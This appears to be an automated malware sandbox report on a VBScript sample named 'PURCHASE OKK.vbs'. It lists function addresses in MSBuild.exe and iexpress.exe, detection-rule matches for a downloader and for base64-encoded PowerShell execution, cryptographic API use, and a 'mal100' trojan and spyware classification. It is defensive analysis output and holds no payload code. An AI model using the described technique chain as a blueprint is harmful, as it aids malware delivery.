                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A3D34C10_2_01A3D34C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A552A010_2_01A552A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AF12ED10_2_01AF12ED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6B2C010_2_01A6B2C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AF027410_2_01AF0274
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AED5B010_2_01AED5B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B1059110_2_01B10591
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A5053510_2_01A50535
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B0757110_2_01B07571
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AFE4F610_2_01AFE4F6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B0F43F10_2_01B0F43F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A4146010_2_01A41460
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B0244610_2_01B02446
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B0F7B010_2_01B0F7B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A4C7C010_2_01A4C7C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A5077010_2_01A50770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A7475010_2_01A74750
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6C6E010_2_01A6C6E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B016CC10_2_01B016CC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A529A010_2_01A529A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B1A9A610_2_01B1A9A6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6696210_2_01A66962
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A5995010_2_01A59950
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6B95010_2_01A6B950
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A368B810_2_01A368B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A538E010_2_01A538E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A7E8F010_2_01A7E8F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01ABD80010_2_01ABD800
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A5284010_2_01A52840
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A5A84010_2_01A5A840
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6FB8010_2_01A6FB80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A8DBF910_2_01A8DBF9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B06BD710_2_01B06BD7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B0FB7610_2_01B0FB76
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B0AB4010_2_01B0AB40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AEDAAC10_2_01AEDAAC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A95AA010_2_01A95AA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A4EA8010_2_01A4EA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AFDAC610_2_01AFDAC6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AC3A6C10_2_01AC3A6C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B07A4610_2_01B07A46
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B0FA4910_2_01B0FA49
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A68DBF10_2_01A68DBF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A4ADE010_2_01A4ADE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6FDC010_2_01A6FDC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A5AD0010_2_01A5AD00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B07D7310_2_01B07D73
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A53D4010_2_01A53D40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B01D5A10_2_01B01D5A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AF0CB510_2_01AF0CB5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B0FCF210_2_01B0FCF2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A40CF210_2_01A40CF2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AC9C3210_2_01AC9C32
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A50C0010_2_01A50C00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B0FFB110_2_01B0FFB1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A51F9210_2_01A51F92
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A5CFE010_2_01A5CFE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A42FC810_2_01A42FC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A92F2810_2_01A92F28
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A70F3010_2_01A70F30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B0FF0910_2_01B0FF09
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AC4F4010_2_01AC4F40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A59EB010_2_01A59EB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B0CE9310_2_01B0CE93
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A62E9010_2_01A62E90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B0EEDB10_2_01B0EEDB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B0EE2610_2_01B0EE26
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A50E5910_2_01A50E59
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E7E4F612_2_04E7E4F6
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E8244612_2_04E82446
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DC146012_2_04DC1460
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E8F43F12_2_04E8F43F
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E6D5B012_2_04E6D5B0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E9059112_2_04E90591
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E8757112_2_04E87571
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DD053512_2_04DD0535
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E816CC12_2_04E816CC
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DEC6E012_2_04DEC6E0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DCC7C012_2_04DCC7C0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E8F7B012_2_04E8F7B0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DF475012_2_04DF4750
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DD077012_2_04DD0770
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E870E912_2_04E870E9
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E8F0E012_2_04E8F0E0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DD70C012_2_04DD70C0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E7F0CC12_2_04E7F0CC
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E881CC12_2_04E881CC
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E901AA12_2_04E901AA
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DDB1B012_2_04DDB1B0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E9B16B12_2_04E9B16B
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E0516C12_2_04E0516C
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DBF17212_2_04DBF172
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DC010012_2_04DC0100
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E6A11812_2_04E6A118
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E712ED12_2_04E712ED
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DEB2C012_2_04DEB2C0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DD52A012_2_04DD52A0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E7027412_2_04E70274
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E903E612_2_04E903E6
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DDE3F012_2_04DDE3F0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E1739A12_2_04E1739A
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DBD34C12_2_04DBD34C
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E8A35212_2_04E8A352
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E8132D12_2_04E8132D
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E8FCF212_2_04E8FCF2
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DC0CF212_2_04DC0CF2
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E70CB512_2_04E70CB5
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E49C3212_2_04E49C32
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DD0C0012_2_04DD0C00
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DEFDC012_2_04DEFDC0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DCADE012_2_04DCADE0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DE8DBF12_2_04DE8DBF
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E87D7312_2_04E87D73
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DD3D4012_2_04DD3D40
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E81D5A12_2_04E81D5A
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DDAD0012_2_04DDAD00
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E8EEDB12_2_04E8EEDB
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DE2E9012_2_04DE2E90
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DD9EB012_2_04DD9EB0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E8CE9312_2_04E8CE93
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DD0E5912_2_04DD0E59
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E8EE2612_2_04E8EE26
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DC2FC812_2_04DC2FC8
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DDCFE012_2_04DDCFE0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DD1F9212_2_04DD1F92
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E8FFB112_2_04E8FFB1
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E44F4012_2_04E44F40
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E8FF0912_2_04E8FF09
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DF0F3012_2_04DF0F30
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DFE8F012_2_04DFE8F0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DD38E012_2_04DD38E0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DB68B812_2_04DB68B8
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DD284012_2_04DD2840
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DDA84012_2_04DDA840
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E9A9A612_2_04E9A9A6
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DD29A012_2_04DD29A0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DD995012_2_04DD9950
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DEB95012_2_04DEB950
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DE696212_2_04DE6962
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E7DAC612_2_04E7DAC6
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E15AA012_2_04E15AA0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E6DAAC12_2_04E6DAAC
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DCEA8012_2_04DCEA80
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E43A6C12_2_04E43A6C
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E8FA4912_2_04E8FA49
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E87A4612_2_04E87A46
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E0DBF912_2_04E0DBF9
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E86BD712_2_04E86BD7
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DEFB8012_2_04DEFB80
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E8FB7612_2_04E8FB76
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E8AB4012_2_04E8AB40
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_02ED204012_2_02ED2040
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_02ECB24912_2_02ECB249
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_02ECB20012_2_02ECB200
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_02ECD0D012_2_02ECD0D0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_02ECB0B012_2_02ECB0B0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_02ECB1F512_2_02ECB1F5
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_02ED572012_2_02ED5720
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_02ED390E12_2_02ED390E
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_02ED391012_2_02ED3910
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_02ECCEB012_2_02ECCEB0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_02EEBE9012_2_02EEBE90
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04CEE6F912_2_04CEE6F9
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04CEE6F112_2_04CEE6F1
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04CED7B812_2_04CED7B8
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04CEE23412_2_04CEE234
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04CEE35412_2_04CEE354
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 01A3B970 appears 266 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 01A97E54 appears 88 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 01ACF290 appears 105 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 01A85130 appears 36 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 01ABEA12 appears 84 times
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: String function: 04DBB970 appears 266 times
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: String function: 04E17E54 appears 88 times
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: String function: 04E4F290 appears 105 times
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: String function: 04E05130 appears 36 times
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: String function: 04E3EA12 appears 84 times
                  Source: PURCHASE OKK.vbsInitial sample: Strings found which are bigger than 50
                  Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 3769
                  Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 3769Jump to behavior
                  Source: 8.2.powershell.exe.15d903ef8d0.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RawPaste_Reverse_URL author = ditekSHen, description = Detects executables (downloaders) containing reversed URLs to raw contents of a paste
                  Source: 8.2.powershell.exe.15d903ef8d0.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
                  Source: Process Memory Space: powershell.exe PID: 7780, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: powershell.exe PID: 7916, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: powershell.exe PID: 8040, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: 8.2.powershell.exe.15da8710000.3.raw.unpack, h.csCryptographic APIs: 'CreateDecryptor'
                  Source: 8.2.powershell.exe.15da8710000.3.raw.unpack, av.csCryptographic APIs: 'CreateDecryptor'
                  Source: 8.2.powershell.exe.15d903ef8d0.0.raw.unpack, h.csCryptographic APIs: 'CreateDecryptor'
                  Source: 8.2.powershell.exe.15d903ef8d0.0.raw.unpack, av.csCryptographic APIs: 'CreateDecryptor'
                  Source: 8.2.powershell.exe.15da8750000.4.raw.unpack, b.csCryptographic APIs: 'CreateDecryptor'
                  Source: 8.2.powershell.exe.15da8750000.4.raw.unpack, am.csCryptographic APIs: 'CreateDecryptor'
                  Source: 8.2.powershell.exe.15d905607b0.1.raw.unpack, b.csCryptographic APIs: 'CreateDecryptor'
                  Source: 8.2.powershell.exe.15d905607b0.1.raw.unpack, am.csCryptographic APIs: 'CreateDecryptor'
                  Source: 12.2.iexpress.exe.310a910.0.raw.unpack, TaskParameter.csTask registration methods: 'CreateNewTaskItemFrom'
                  Source: 12.2.iexpress.exe.310a910.0.raw.unpack, OutOfProcTaskHostNode.csTask registration methods: 'RegisterTaskObject', 'UnregisterPacketHandler', 'RegisterPacketHandler', 'UnregisterTaskObject', 'GetRegisteredTaskObject'
                  Source: 12.2.iexpress.exe.310a910.0.raw.unpack, TaskLoader.csTask registration methods: 'CreateTask'
                  Source: 12.2.iexpress.exe.310a910.0.raw.unpack, RegisteredTaskObjectCacheBase.csTask registration methods: 'GetLazyCollectionForLifetime', 'RegisterTaskObject', 'DisposeObjects', 'IsCollectionEmptyOrUncreated', 'UnregisterTaskObject', 'DisposeCacheObjects', 'GetRegisteredTaskObject', 'GetCollectionForLifetime'
                  Source: 20.2.DmMVOWsP1JSI77P.exe.327cd14.1.raw.unpack, CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 20.2.DmMVOWsP1JSI77P.exe.327cd14.1.raw.unpack, CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 20.2.DmMVOWsP1JSI77P.exe.327cd14.1.raw.unpack, NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent(bool)
                  Source: 20.2.DmMVOWsP1JSI77P.exe.327cd14.1.raw.unpack, NodeEndpointOutOfProcBase.csSecurity API names: System.IO.Pipes.PipeSecurity.AddAccessRule(System.IO.Pipes.PipeAccessRule)
                  Source: 20.2.DmMVOWsP1JSI77P.exe.327cd14.1.raw.unpack, NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 12.2.iexpress.exe.53bcd14.3.raw.unpack, NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent(bool)
                  Source: 12.2.iexpress.exe.53bcd14.3.raw.unpack, NodeEndpointOutOfProcBase.csSecurity API names: System.IO.Pipes.PipeSecurity.AddAccessRule(System.IO.Pipes.PipeAccessRule)
                  Source: 12.2.iexpress.exe.53bcd14.3.raw.unpack, NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 12.2.iexpress.exe.310a910.0.raw.unpack, NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent(bool)
                  Source: 12.2.iexpress.exe.310a910.0.raw.unpack, NodeEndpointOutOfProcBase.csSecurity API names: System.IO.Pipes.PipeSecurity.AddAccessRule(System.IO.Pipes.PipeAccessRule)
                  Source: 12.2.iexpress.exe.310a910.0.raw.unpack, NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 12.2.iexpress.exe.310a910.0.raw.unpack, CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 12.2.iexpress.exe.310a910.0.raw.unpack, CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 12.2.iexpress.exe.53bcd14.3.raw.unpack, CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 12.2.iexpress.exe.53bcd14.3.raw.unpack, CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: iexpress.exe, 0000000C.00000002.2231547950.00000000053BC000.00000004.10000000.00040000.00000000.sdmp, iexpress.exe, 0000000C.00000002.2227220889.000000000310A000.00000004.00000020.00020000.00000000.sdmp, DmMVOWsP1JSI77P.exe, 00000014.00000002.2230655033.000000000327C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.1565665797.000000001EA8C000.00000004.80000000.00040000.00000000.sdmpBinary or memory string: .configAMSBUILDDIRECTORYDELETERETRYCOUNTCMSBUILDDIRECTORYDELETRETRYTIMEOUT.sln
                  Source: iexpress.exe, 0000000C.00000002.2231547950.00000000053BC000.00000004.10000000.00040000.00000000.sdmp, iexpress.exe, 0000000C.00000002.2227220889.000000000310A000.00000004.00000020.00020000.00000000.sdmp, DmMVOWsP1JSI77P.exe, 00000014.00000002.2230655033.000000000327C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.1565665797.000000001EA8C000.00000004.80000000.00040000.00000000.sdmpBinary or memory string: MSBuild MyApp.sln /t:Rebuild /p:Configuration=Release
                  Source: iexpress.exe, 0000000C.00000002.2231547950.00000000053BC000.00000004.10000000.00040000.00000000.sdmp, iexpress.exe, 0000000C.00000002.2227220889.000000000310A000.00000004.00000020.00020000.00000000.sdmp, DmMVOWsP1JSI77P.exe, 00000014.00000002.2230655033.000000000327C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.1565665797.000000001EA8C000.00000004.80000000.00040000.00000000.sdmpBinary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb
                  Source: iexpress.exe, 0000000C.00000002.2231547950.00000000053BC000.00000004.10000000.00040000.00000000.sdmp, iexpress.exe, 0000000C.00000002.2227220889.000000000310A000.00000004.00000020.00020000.00000000.sdmp, DmMVOWsP1JSI77P.exe, 00000014.00000002.2230655033.000000000327C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.1565665797.000000001EA8C000.00000004.80000000.00040000.00000000.sdmpBinary or memory string: *.sln
                  Source: iexpress.exe, 0000000C.00000002.2231547950.00000000053BC000.00000004.10000000.00040000.00000000.sdmp, iexpress.exe, 0000000C.00000002.2227220889.000000000310A000.00000004.00000020.00020000.00000000.sdmp, DmMVOWsP1JSI77P.exe, 00000014.00000002.2230655033.000000000327C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.1565665797.000000001EA8C000.00000004.80000000.00040000.00000000.sdmpBinary or memory string: MSBuild MyApp.csproj /t:Clean
                  Source: iexpress.exe, 0000000C.00000002.2231547950.00000000053BC000.00000004.10000000.00040000.00000000.sdmp, iexpress.exe, 0000000C.00000002.2227220889.000000000310A000.00000004.00000020.00020000.00000000.sdmp, DmMVOWsP1JSI77P.exe, 00000014.00000002.2230655033.000000000327C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.1565665797.000000001EA8C000.00000004.80000000.00040000.00000000.sdmpBinary or memory string: /ignoreprojectextensions:.sln
                  Source: iexpress.exe, 0000000C.00000002.2231547950.00000000053BC000.00000004.10000000.00040000.00000000.sdmp, iexpress.exe, 0000000C.00000002.2227220889.000000000310A000.00000004.00000020.00020000.00000000.sdmp, DmMVOWsP1JSI77P.exe, 00000014.00000002.2230655033.000000000327C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.1565665797.000000001EA8C000.00000004.80000000.00040000.00000000.sdmpBinary or memory string: MSBUILD : error MSB1048: Solution files cannot be debugged directly. Run MSBuild first with an environment variable MSBUILDEMITSOLUTION=1 to create a corresponding ".sln.metaproj" file. Then debug that.
                  Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winVBS@21/15@12/9
